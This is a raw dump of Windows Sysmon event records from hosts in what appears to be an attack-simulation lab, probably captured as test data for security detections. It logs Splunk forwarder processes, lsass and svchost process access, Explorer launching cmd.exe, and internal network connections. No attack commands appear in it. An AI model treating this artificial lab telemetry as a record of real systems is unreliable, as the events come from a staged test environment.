10341000x8000000000000000193582Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:19.304{2E1864BB-E1BD-6299-A700-000000005F02}47004496C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2E1864BB-1777-629A-753D-000000005F02}2932C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000193581Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:19.309{2E1864BB-1777-629A-753D-000000005F02}2932C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{2E1864BB-E13C-6299-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000193580Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:19.304{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9DF0170EFBC84C47EE60EACDCC10069F,SHA256=45FA3391A2AA4D8F8CC55C17CABBD3F036B54E2C328656578046FC4C2DA77283,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000193601Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:20.952{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8641F65BC272B4FC54B65F847858373A,SHA256=2DACB747BC0ECCB952AAE09628786017F7E5E067C39FD8B4742FD979B65B4E2B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000043756Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:20.609{0A5DF930-E3BE-6299-9D00-000000006002}2084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=2224D82A5B4927733855C57EFBF2F2BB,SHA256=2B55E8CD63E9942FB963A31CA4555322B48872FC923CDD71E530726035264156,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000043755Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:20.031{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6BA2F17105EA147C2034CF4B85D28E74,SHA256=898A7518581C4A75846F5B76DD7D2289E37F2E7E87FA041D7C5BFA98A0E81DE5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000193600Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:20.752{2E1864BB-FA4D-6299-5F07-000000005F02}6532ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\or89gb4t.default-release\datareporting\glean\db\data.safe.binMD5=0721B07439B47738E8A85FDB42159E8E,SHA256=7830B07C7F2EB8273F230188FE262B90876C82F526CED81E37D108BB79045412,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000193599Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:20.305{2E1864BB-1777-629A-763D-000000005F02}57365628C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+610325|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60fe56|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60943|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60f97|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+9e7f20|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000043757Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:21.124{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EE5F64F68337DBFEA8DA74BA0DC540A0,SHA256=06C16CDCE3C6BDDFA68FF5D6B76E518DCF4C6AB18DA6F00DE089EF47FB296C18,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000043758Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:22.218{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C4523050CBADB927C67FF321D6D4EA8,SHA256=5D81125635B7E468E21D4CD1B7514BDD60EF527CB8964FF12988D7327690233D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000193610Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:22.651{2E1864BB-E1BE-6299-AB00-000000005F02}92876C:\Windows\system32\conhost.exe{2E1864BB-177A-629A-773D-000000005F02}732C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193609Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:22.651{2E1864BB-E13C-6299-0500-000000005F02}416780C:\Windows\system32\csrss.exe{2E1864BB-177A-629A-773D-000000005F02}732C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000193608Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:22.651{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193607Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:22.651{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193606Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:22.651{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193605Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:22.651{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193604Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:22.651{2E1864BB-E1BD-6299-A700-000000005F02}47004496C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2E1864BB-177A-629A-773D-000000005F02}732C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000193603Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:22.652{2E1864BB-177A-629A-773D-000000005F02}732C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.2.5Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2E1864BB-E13C-6299-E703-000000000000}0x3e70SystemMD5=40AB9FBBAEDDA47FD9B0A2EC5E183B97,SHA256=8A7CB60452D38C258714CE37C2C490E78007A9E4F4F9A94B270BDBA59FA8F1AE,IMPHASH=35240A25EDE7EC5A65BF627E57E772B9{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000193602Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:22.004{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1CD639BD04185962A07BB817E7FED424,SHA256=BC830788FED366C7AF6D10B131442EC0F280808C2E701515C94DBC292AB665B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000043760Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:23.312{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A0F5DBE454F675F0590EE621D326999,SHA256=9BC4F5531AD1A9DC58296073E47E2215342652CE792F9D29B4759C7AD2305099,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000193623Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:23.751{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BD496A096FB21735D75201C6AAC7CC3C,SHA256=5816D5EBEC3B5AF2D81835B84923999EAF4C1CC6B3AAC8FC1234E1B964DF975B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000193622Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:23.289{2E1864BB-FA2C-6299-4D07-000000005F02}33763132C:\Windows\Explorer.EXE{2E1864BB-0F1D-629A-270A-000000005F02}4676C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+dadff|C:\Windows\System32\SHELL32.dll+dbd25|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13beff|C:\Windows\System32\windows.storage.dll+13ac83|C:\Windows\System32\windows.storage.dll+1391af|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193621Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:23.289{2E1864BB-FA2C-6299-4D07-000000005F02}33763132C:\Windows\Explorer.EXE{2E1864BB-0F1D-629A-270A-000000005F02}4676C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+dbc3e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13beff|C:\Windows\System32\windows.storage.dll+13ac83|C:\Windows\System32\windows.storage.dll+1391af|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193620Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:23.289{2E1864BB-FA2C-6299-4D07-000000005F02}33763132C:\Windows\Explorer.EXE{2E1864BB-0F1D-629A-270A-000000005F02}4676C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+db054|C:\Windows\System32\SHELL32.dll+dbc07|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13beff|C:\Windows\System32\windows.storage.dll+13ac83|C:\Windows\System32\windows.storage.dll+1391af|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193619Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:23.285{2E1864BB-FA2C-6299-4D07-000000005F02}33765148C:\Windows\Explorer.EXE{2E1864BB-0F1D-629A-280A-000000005F02}7828C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+dadff|C:\Windows\System32\SHELL32.dll+dc3b0|C:\Windows\System32\TwinUI.dll+100021|C:\Windows\System32\TwinUI.dll+10088f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193618Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:23.285{2E1864BB-FA2C-6299-4D07-000000005F02}33765148C:\Windows\Explorer.EXE{2E1864BB-0F1D-629A-280A-000000005F02}7828C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+123a10|C:\Windows\System32\SHELL32.dll+dc36c|C:\Windows\System32\TwinUI.dll+100021|C:\Windows\System32\TwinUI.dll+10088f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193617Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:23.285{2E1864BB-FA2C-6299-4D07-000000005F02}33765148C:\Windows\Explorer.EXE{2E1864BB-0F1D-629A-280A-000000005F02}7828C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+db054|C:\Windows\System32\SHELL32.dll+dc340|C:\Windows\System32\TwinUI.dll+100021|C:\Windows\System32\TwinUI.dll+10088f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193616Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:23.285{2E1864BB-FA2C-6299-4D07-000000005F02}33765148C:\Windows\Explorer.EXE{2E1864BB-0F1D-629A-280A-000000005F02}7828C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+ffe59|C:\Windows\System32\TwinUI.dll+10088f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193615Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:23.236{2E1864BB-E13C-6299-0B00-000000005F02}6364072C:\Windows\system32\lsass.exe{2E1864BB-E13A-6299-0100-000000005F02}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+976d2|C:\Windows\system32\kerberos.DLL+79b14|C:\Windows\system32\kerberos.DLL+1444f|C:\Windows\system32\lsasrv.dll+2f1c1|C:\Windows\system32\lsasrv.dll+2d0a6|C:\Windows\system32\lsasrv.dll+328e9|C:\Windows\system32\lsasrv.dll+30237|C:\Windows\system32\lsasrv.dll+2f1c1|C:\Windows\system32\lsasrv.dll+174fd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e 354300x8000000000000000193614Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:20.844{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56331-false10.0.1.12-8000- 10341000x8000000000000000193613Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:23.152{2E1864BB-E13C-6299-0B00-000000005F02}6364072C:\Windows\system32\lsass.exe{2E1864BB-E13E-6299-1000-000000005F02}364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000193612Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:23.120{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8CBC81449C8513BFD39406E9B37601C1,SHA256=EDBE7CB8FD283963EEAA3CA00764A3AD9EFAB3729B1CCD95A73E2887C591F5CA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000193611Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:23.120{2E1864BB-E13C-6299-0B00-000000005F02}6364072C:\Windows\system32\lsass.exe{2E1864BB-E13E-6299-1000-000000005F02}364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x800000000000000043759Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:20.736{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52312-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000043761Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:24.406{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4A56E63A1C4FB488E8D606F331A9256E,SHA256=7685F7530D657533910AC3DECD3A0169B1196AE50BDB16B03D8756DD78615679,IMPHASH=00000000000000000000000000000000falsetrue 